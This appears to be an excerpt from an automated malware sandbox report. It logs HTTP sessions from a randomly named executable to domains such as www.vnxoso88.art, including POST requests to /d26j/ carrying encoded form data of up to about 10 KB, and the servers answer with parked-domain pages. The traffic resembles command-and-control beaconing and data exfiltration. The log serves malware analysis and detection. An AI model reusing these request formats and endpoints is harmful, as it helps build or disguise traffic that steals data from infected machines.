                                                                          Data Ascii: L2m0Zn=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb29K9TeQ4lVSMq+7jRoOhjStaBAQO9LoeSemMGCKUQhZKkm9ihrhSJi2wPadaszkZm5IAr7rhsI3mp9plPHn4wJTBZqyKwLY6ediiskkWQ9iOyFL/ilRn98zqsMxMleWj2hVrEE9c4ssyzEhWjecrlT1EJ25sShJVSO3xxXb5L5vroLNAOXTHOmeT2FAKxZz6HgdLGCTtl6jYl3X+W/bFfYID5h+jTMlSt8ztMOIbShw2tOFu9JOOqhRyQpmQHnKVv6UzxNcQ135nl+mN7iTyg08P9ZCYd5mC8/f44bmIdJq9IQijAXIZCIXf4HvxmhyZaYHobGSZZ2E7NXd0TqCqGDRF8cuwgfizCROJ16Pp28Gxpsw/LeCae3jUefkyHftS1rInhGPw1+YDTVDRYBh4H36W45QAE7BCiAoOetXJkOYdwYjFxyICGxIQ5D3WKPD9ELcbKot0O5ySYueMYQpBk1nYsGnZvdobC6YfmC9ixwNPYEgDO+cXvOfByqQ4fkxf07VsTJJPQ5j5fOs2TFjsLftAAH/C96iGZCc554baKbeZ+M9cKokETtnvunvdQ8w00PSHbzYm+/UzRFHAdPbsquKJkAjMWYJKn4NZjXDjs7MBnI2+5ZcAfZHzdHwGi9n6b1m/lik4l/je1woGgaGAQ2D0gP1csNNbN4BFdObLaOvhL6D4m8Yc581eJiNNo1yUYOxsGvaHvsISBh/eu2Bdm6Y5WyvYEtMrp0LHwkGdIgF7jT4kVT/RzR3/jrTmMD4SEKwCVr2BNGYNFaql9pWU3uyhq2DwdYBcTRv2+PGYmKAQwLaILTMs9XdCBnICEndpRu1U [TRUNCATED]
                                                                          Nov 12, 2024 08:52:43.575428963 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:42 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: a17c16c4-53c3-4ab2-b7a5-275cdb136990
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=a17c16c4-53c3-4ab2-b7a5-275cdb136990; expires=Tue, 12 Nov 2024 08:07:43 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:43.575443983 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE3YzE2YzQtNTNjMy00YWIyLWI3YTUtMjc1Y2RiMTM2OTkwIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.449780199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:45.504862070 CET381OUTGET /ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:52:47.113971949 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:46 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1494
                                                                          x-request-id: 195798bb-9bbb-44f6-803c-b841b01d2087
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zU13rs/HK1AdXfXSfPeRrqRvYTAFGLNDO0ao1fzA501ucKs3rupzQZ1Uvf8nFWqdG9n4zjg+ZnX12cb1mi5vLQ==
                                                                          set-cookie: parking_session=195798bb-9bbb-44f6-803c-b841b01d2087; expires=Tue, 12 Nov 2024 08:07:47 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 55 31 33 72 73 2f 48 4b 31 41 64 58 66 58 53 66 50 65 52 72 71 52 76 59 54 41 46 47 4c 4e 44 4f 30 61 6f 31 66 7a 41 35 30 31 75 63 4b 73 33 72 75 70 7a 51 5a 31 55 76 66 38 6e 46 57 71 64 47 39 6e 34 7a 6a 67 2b 5a 6e 58 31 32 63 62 31 6d 69 35 76 4c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zU13rs/HK1AdXfXSfPeRrqRvYTAFGLNDO0ao1fzA501ucKs3rupzQZ1Uvf8nFWqdG9n4zjg+ZnX12cb1mi5vLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:47.113987923 CET947INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTk1Nzk4YmItOWJiYi00NGY2LTgwM2MtYjg0MWIwMWQyMDg3IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.449821199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:52.594949961 CET631OUTPOST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 2b 59 62 57 6b 71 72 54 5a 77 4e 61 4c 49 70 4d 4b 31 73 38 79 57 65 6f 31 73 39 6d 48 4c 4f 36 51 3d 3d
                                                                          Data Ascii: L2m0Zn=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2+YbWkqrTZwNaLIpMK1s8yWeo1s9mHLO6Q==
                                                                          Nov 12, 2024 08:52:53.222028017 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:52 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: 032c1e63-0f21-46e0-a698-856107043d0d
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=032c1e63-0f21-46e0-a698-856107043d0d; expires=Tue, 12 Nov 2024 08:07:53 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:53.222039938 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMyYzFlNjMtMGYyMS00NmUwLWE2OTgtODU2MTA3MDQzZDBkIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.449837199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:55.131661892 CET651OUTPOST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 79 74 31 79 6c 4a 72 45 32 48 68 63 69 43 36 47 6b 74 6b 54 64 6d 73 48 7a 4b 7a 4a 44 44 55 79 49 3d
                                                                          Data Ascii: L2m0Zn=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uyyt1ylJrE2HhciC6GktkTdmsHzKzJDDUyI=
                                                                          Nov 12, 2024 08:52:55.756385088 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:54 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: d55c7a5d-ef36-4222-be6d-21dce942cca2
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=d55c7a5d-ef36-4222-be6d-21dce942cca2; expires=Tue, 12 Nov 2024 08:07:55 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:55.756422997 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDU1YzdhNWQtZWYzNi00MjIyLWJlNmQtMjFkY2U5NDJjY2EyIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.449852199.59.243.227802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:52:57.679811954 CET10733OUTPOST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 49 56 66 70 73 46 45 2f 51 74 33 67 75 4b 68 46 4e 74 79 6c 48 4c 67 4f 57 62 38 6d 42 30 35 53 46 4d 72 48 36 77 68 73 50 61 49 32 7a 48 32 4d 39 75 76 66 77 65 36 42 65 62 34 77 43 41 64 53 57 56 48 6e 2f 44 34 30 79 45 64 37 61 43 33 58 58 65 2b 6f 6b 4a 67 59 59 75 4d 48 78 35 30 31 75 53 54 31 44 4d 43 67 75 57 7a 33 4e 33 4a 54 30 30 79 4f 38 6a 67 41 53 6c 56 79 76 55 71 79 6f 44 56 51 35 65 58 37 62 57 38 4a 44 75 37 36 49 65 4f 63 68 76 7a 45 73 43 33 6c 6b 65 67 59 2b [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJJ3BI4PMM7VEbmwFXZ0ybrfZhduK9VWoVohIHVy1/Vn+G1wbBZ5I38M/7U1NjU5WhZUbb5mHpR2LBdsEnrqcnU8a88FguymsBBOb1OS/MtA8U707xFQozWb3sgaIEuWS6IVfpsFE/Qt3guKhFNtylHLgOWb8mB05SFMrH6whsPaI2zH2M9uvfwe6Beb4wCAdSWVHn/D40yEd7aC3XXe+okJgYYuMHx501uST1DMCguWz3N3JT00yO8jgASlVyvUqyoDVQ5eX7bW8JDu76IeOchvzEsC3lkegY+5Aj6+Iu2pzd7tMtI2XMN5gWju9yrSaoeCil5BPwZOSVqeYl8gxV1IH9NgOSVotaw0w8tuwgZuKpVUCnhvUw5k+pDPA1E4+E2uCcO3dalNisR8SWV0LOOSvboLvkJU2wHLT5RN6AsfbnjLnWmdgyJS/PhTdBRmK4SOjCM+nH97Esk2qzZ0pwjJ9rnaWEugRdCHy8NEXyQvapELZJu+ylgzsVeVDvbrdyQ/mffOt/xxLgA/tYNFHk2JeHL+ATxw4zsnq5VdItFIP2SCOVx628ncYSNS8tDDltf/eEZeJ1DkBBrKF9vysatuELIb8hPHryj+d/XP2xLxjcOtpg3fiudFyZahMK+lQ4f5I/pf7Ue7HJRQbCik6UNiZKeW0g6ha11BRq4lUdCAagY2c5EGpdse5wfVOTGkRZsmUbat3tdptcCXKJjbRoQv+qbr6XA7O+wrP4NMCCcWy5XsnFCIHPztkNZ83gkTnGfWZLvbj8s9oamPUgiN8fZDC2dSk6loLGWBzj1f0V3TQZbCQxXVz1I3ybeDw1BKmCGV2Ib7dbYuccOb8KIXXTIjPtP7zWgkn23+OfsojbuLnqtkao9E8xTUS2NJiLrJWCCAPoFnJrHJ9IgEIh4ZN1qxP8MAdDxcgTeo0ZbQCetNDr6/zSyjV1jutiIFW/6Z6auGV [TRUNCATED]
                                                                          Nov 12, 2024 08:52:58.297275066 CET1236INHTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:57 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: 290819f2-0e0f-46e6-87db-617d26f0bb5c
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
